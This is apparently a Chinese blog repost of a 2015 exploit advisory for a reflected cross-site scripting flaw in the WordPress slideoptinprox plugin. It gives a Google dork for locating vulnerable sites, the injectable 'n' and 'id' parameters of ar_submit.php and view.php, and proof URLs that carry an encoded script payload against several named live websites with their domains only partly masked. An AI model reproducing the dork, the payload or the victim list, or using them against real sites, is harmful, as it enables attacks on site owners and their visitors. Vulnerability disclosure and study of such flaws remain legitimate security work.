Wordpress插件slideoptinprox跨站脚本漏洞

时间:2015-1-10    作者:admin    分类: 技术交流

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

|-------------------------------------------------------------------------|

|[] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability

|

|[] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"

|

|[] Date : Date: 2015-01-08

|

|[] Exploit Author: Ashiyane Digital Security Team

|

|[]Vendor Homepage : https://pluginu.com/slideoptinprox/

|

|[] Tested on: Windows 8.1,Kali Linux

|

|-------------------------------------------------------------------------|

|

|[] Location :

[localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]

|

|-------------------------------------------------------------------------|

|[] Proof:

|

|[]

http://www.fishingfanatic.XXXus/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%

281%29;%3C/script%3E

|

|[]

http://www.beziehung-XXretten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ea

lert%281%29;%3C/script%3E

|

|[]

http://voiceacting.coXXm/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%2

81%29;%3C/script%3E

|

|[]

http://drdebranixXXXom/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

|

|[]

http://pinguin-werkstatXt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%2

81%29;%3C/script%3E|

|-------------------------------------------------------------------------|

|[] Discovered By : 4L1R3Z4 |

|-------------------------------------------------------------------------|

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

标签: wordpress xss

感谢9年的陪伴,江湖再见!!!

标签

热门文章

链接